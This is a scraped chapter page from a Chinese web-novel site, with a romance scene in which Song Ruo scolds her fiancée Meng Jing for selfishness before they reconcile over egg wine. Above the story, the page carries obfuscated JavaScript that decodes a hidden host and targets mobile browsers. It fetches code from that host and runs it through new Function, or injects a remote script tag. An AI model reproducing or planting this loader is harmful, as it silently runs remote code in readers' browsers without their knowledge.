98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(95(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟璟:我霸道?

难道不是?宋若手撑在雪杖上,叹了口气,什么都要按你的意思来。你觉得发生了太多事,无法面对的时候,说走就走,说消失就消失,甚至连个缓冲时间都不给我,更妙的是,你想回来就回来,在你的潜意识里,难道不是认为我必须在等你?我是你的什么?未婚妻?你对我有那份尊重吗?并且我早就跟你说过,我是穿书来的,你那么放心大胆地走了,我即使消失你也无所谓吧?你还说我不在乎你,你又有多在乎我呢?见孟璟急于说话的样子,她朝她摆了摆手,这些都是陈年旧事,过去了就过去了,我不该翻旧账。但现在不也还是这样?我们的相处要按你的期待走。我连遇到事情的反应都必须如你所愿。当有人来勾搭你的时候,你觉得我应该暴跳如雷,河东狮子吼,宣誓主权,是不是?

这时候若若顿了顿,孟璟是有了一个插话的机会,然而她张了张嘴,却什么也没说出来。

我连暗暗伤心的权利都没有了吗?若若的眼圈儿红了,我不能抱有淡然处之的态度吗?一定要和你哭闹才算情真意切?这世上的人有千百种,并不是每一个人都像你一样的,孟璟。

孟璟觉得自己的眼睛也又酸又热,马上要哭了,但是,不可以,现在哭的话就太过分了,她拉住未婚妻的手,那,那,那这个样子的我,你喜不喜欢嘛我常常害怕老婆不喜欢我了我真的很怕失去你呀。

宋若推开她的手,你别碰我。

不行的,我要碰你。孟璟词穷,说着干巴巴的话,永远不能不碰。

让开。若若非常坚决地走了,留给她一个小小的背影。

孟璟站在原地,眼泪哗啦啦地流了一脸。还是不过瘾,蹲下来抱头哭。她才发现未婚妻说得都没有错,她太自我中心了。一直说要包容理解。可她几时做到了。这么久了还是一样的幼稚。尤其到了关键时刻还是那么冲动,甚至险些害得若若出危险。她太不是个东西了!

哎。有人踹了踹她。

谁啊?孟璟抬头,满脸泪痕。一见是秦萌,一秒切换到冷漠脸,站起身来,抬手在脸上胡乱抹了一把。

小罗在房间张罗晚饭,不多时见自家艺人回来了,却和先前的飒爽英姿不同,也不是甜美娇俏那一挂的,倒仿佛出去演了个苦情女一,刚下戏,没出得来,一脸泪痕狼藉。

若、若,若若小罗舌头打结,老板。

你去吧,我休息一下。若若的语气倒还是很平静怡人的。

小罗稍安,指指桌子上,我煲了汤,若若还想吃什么呀?我现在就去准备。也别太严格了,偶尔需要放纵一下。吃饱了心情就会好很多说到一半自觉是说得太多了一点,连忙捂住嘴,自责道:我是不是太啰嗦了呀。

宋若摇摇头,抿嘴微笑:没有,你很好,谢谢你。滑雪有点累着了,我想先睡一觉。

小罗火速抓过包退了出去,好好好,你休息,我不吵你啦。

小罗在门口站岗,大概过了十几分钟,孟璟才出现,也是眼睛红红的。小罗恶狠狠地剜了她一眼:我虽然是你和若若的cp粉,但是你再惹她哭的话可不行,你知不知道有多少人惦记她呀,和你说这么几年,那些影帝影后,可都迷恋着她呢,还有很厉害的圈外人士,要不是你在这里挡道哼了一声,若若但凡有个二心,脚踏几条船这种事可轮不到你。

孟璟默默的,抬手拍了拍她的头顶,谢谢。

不过,小罗脸红起来,抓抓脑袋,你要是把若若哄好了,以后也好好对她,我还是愿意做你和她的cp粉的谁让若若喜欢你呢。

孟璟接了她的房卡,进了房间。若若躺在枕头上。孟璟探手一摸她的眼睛,还是湿漉漉的。

宋若一被她碰到就坐起来,带着点淡薄的敌意瞅着她,拿被子裹住了自己。

老婆。孟璟凑过来,想亲亲她湿漉漉的眼睛。

宋若拿被子挡住了,别过来。

唔,让我亲亲。

你不是指望我生气吗,我现在正在生气。宋若擦擦脸。

她说话的时候带一点鼻音,格外可爱。还有一种清婉的妩媚之致。

孟璟勾着唇角:生气了,那就罚我,好不好?跪键盘?还是给老婆徒手剥松子?或者脱得只剩小内内,去外边跑圈?

宋若半晌说:晚上别在这。

孟璟唔了一声,老婆感冒啦?

宋若看看她。些微有点警惕的意思。

肯定是刚刚受了寒,又受了惊吓,都是我的错。孟璟低头低得相当诚恳,我去做个鸡蛋酒,驱寒还治感冒,还可以给老婆压压惊。好不好?

宋若想了一想,点头。

孟璟一边煮酒,打鸡蛋,眼睛里一边冒出雀跃的小星星。

很快蛋酒就做好了,屋子内酒香四溢。

孟璟端到床边递给太太,我喂你?

宋若将杯子接过去,我不像你。

孟璟也不说什么,只是带着点纵容意味,坐在近处看她小心翼翼喝那滚热的酒精饮料,眼睛里有安心,也有淡淡的狡黠。

宋若若的嘴唇因此越发红润。她已经恨不得扑上去吻她一下。但是她当然没有这样做。还有好些话没说。

老婆,我以后都会好好注意的。我有什么需要改进的地方,也请老婆多多指教,不要闷在心里。

宋若淡淡看她一眼,就当做是应允了。

于是稍微顿了一顿,孟璟又说:老婆,我刚刚听秦萌说,你还在担心那个若若啊?

宋若双手捧着那只杯子在手心,目光澄澈地看着大鲸鱼。

小药瓶的脸已经泛出一层粉色,孟璟有一秒的暗爽,觉得自己某个阴险的计谋就要得逞,但是这时候,其实是一个非常严肃的时刻。她闭了闭眼,将心里的邪念都赶走赶走,再睁眼,终于也像未婚妻一样内心明净了,你不用担心她了。

宋若好像对这个话题比较感兴趣,歪了歪头,为什么?

Karma。孟璟说。

Karma?宋若重复念了两遍,想了一想,反问:报应,果报?

对。孟璟颔首,你看,老婆在原本的世界,肯定是个很好很善良的女孩子,但是你那么努力却没有得到相应的幸福,所以呢,冥冥之中有一股力量,把你送到我身边,让我一生一世都属于你,作为对你的补偿。

这话不是头一次提了。小时候孟璟就这样说。那个说什么也要强求的大鲸鱼还历历在目。宋若闭上眼,感到时光像水从心田流过。一辈子也许真的不像她想的那么难。她撇了撇嘴,膝盖并拢在身前,下巴搁上去,梦呓似的说:鲸鱼不要脸。

然而大鲸鱼并不介意,反而笑得更酣畅。老婆或打或骂,都能激起她内心深处的愉悦。她指指若若手中的杯子,老婆,趁热喝啊,趁热喝才有效果哦。不可以感冒。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间